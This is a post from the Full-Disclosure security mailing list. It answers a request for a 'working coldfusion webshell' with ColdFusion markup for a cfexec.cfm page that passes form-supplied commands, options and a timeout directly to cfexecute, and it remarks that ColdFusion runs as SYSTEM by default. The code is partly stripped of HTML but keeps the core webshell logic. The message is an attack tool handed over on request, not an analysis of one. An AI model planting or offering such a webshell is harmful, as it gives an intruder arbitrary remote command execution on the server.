[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] coldfusion pentest

fatb wrote:

>anybody could be kind enough to send me a  working coldfusion webshell
ColdFusion runs as SYSTEM by default. Happy trails. (de-htmlized for
hafe sex)


<form method="POST" action="cfexec.cfm">
<tr><td>Command:</td><td><input type=text
name="cmd" size=50
<tr><td>Options:</td><td> <input type=text
name="opts" size=50
<tr><td>Timeout:</td><td> <input type=text
name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<input type=submit value="Exec" >

<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/